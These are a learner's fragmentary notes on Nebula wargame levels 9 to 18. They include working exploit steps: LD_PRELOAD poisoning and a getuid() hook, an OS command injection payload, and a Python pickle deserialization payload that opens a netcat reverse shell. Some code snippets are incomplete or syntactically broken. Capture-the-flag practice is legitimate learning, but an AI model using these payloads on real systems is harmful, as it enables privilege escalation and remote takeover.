Flag 09: will come back later

Flag 10: Try LD_DEBUG exploit race conditon Exploit symbolic link and race condition

fill pipe and redirect to standard output if we can block the setuid binary between the calls to access() and open(), which gives us lot of time. To block the process, we will fill the pipe fully and connect the stdout of flag10 to that pipe so that it blocks during the call to printf(). 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

References-> https://www.win.tue.nl/~aeb/linux/hh/hh-8.html


There are definitely other paths but this is the path i followed Should basically poison LD_PRELOAD

export LD_PRELOAD=`python -c 'print "\x0a/bin/getflag"*4000'`
Then run
python -c 'print "Content-Length: 1\n"' | ./flag11 2>/dev/null

Unfortunately it says getflag is executing on a non-flag account, this doesn’t count i think its some design flaw currently with level 11 as i saw similar comments by users having the same problem

Flag 12: OS command injection

blah;/bin/getflag > /tmp/lv12;echo 1337
go do cat /tmp/lv12

Flag13: does evil stuff similar to what malware does we create a shared object and use LD_PRELOAD to hook getuid() call similar to keyloggers in windows environements hooking keyboard handler functions ? Neat stuff ->

cat getuid.c
# include unistd.h
uid_t getuid(void)
    return 1000;

gcc -fPIC -shared -o newlib.so getuid.c 
export LD_PRELOAD="/home/level13/newlib.so
Your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Flag 14:

import sys
result = ""
ptr = 0
with open(sys.argv[1], "r") as f:
    for c in f.read()[:-1]:
        result += chr(ord(c) - ptr)
        ptr += 1
print result
./decrypt $(cat /home/flag14/token)
cat decrypt.c
int main (int argc, char*argv[])
	for (int i = 0; i < strlen(argv[1]); i++)
		printf("%c", argv[1][i] - i);

Flag 15:

readelf -d flag15 | egrep "NEEDED|RPATH"

come back later; wierd

Flag 16:

$username =~ tr/a-z/A-Z/;  # converts to uppercase
$username =~ s/\s.*//; # strip everything after a space
->#The PARAMETER field modifies all to lower case
->#Now we know that all Char get converted to uppercase, so we are gonna create a bash script in tmp which executes getflag.
->#We cannot specify the absolute path but we can put wildchar path which the system will traverse through and find the right file
->#The file will be named as FLGET which executes get flag and writes output to a file flagc in tmp folder

Putting it all together we construct the following command and url encode it

The above yields
and we pass it as username
In the encoded format it is,
This essentially stores value of /tmp/flg16 script which is upper case in flag variable
then converts to lower case

Reference http://wiki.bash-hackers.org/syntax/pe#case_modification

Flag 17

import pickle
import socket
import os
class payload(object):
  def __reduce__(self):
    comm = "rm /tmp/shell; mknod /tmp/shell p; nc 10008 0</tmp/shell | /bin/sh 1>/tmp/shell"
    return (os.system, (comm,))
payload = pickle.dumps( payload())
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
soc.connect(("", 10007))
print soc.recv(1024)

Straightforward to get the flag.
Flag 18:

ulimit -a | grep files
ulimit -Sn 50
python -c 'print "login test\r\n"*50+"shell\r\n"' | /home/flag18/flag18 -d test -v -v -v
Overload file descriptor ?..didnt work well

STUCK here; will come back for Flag 9 and 15 :(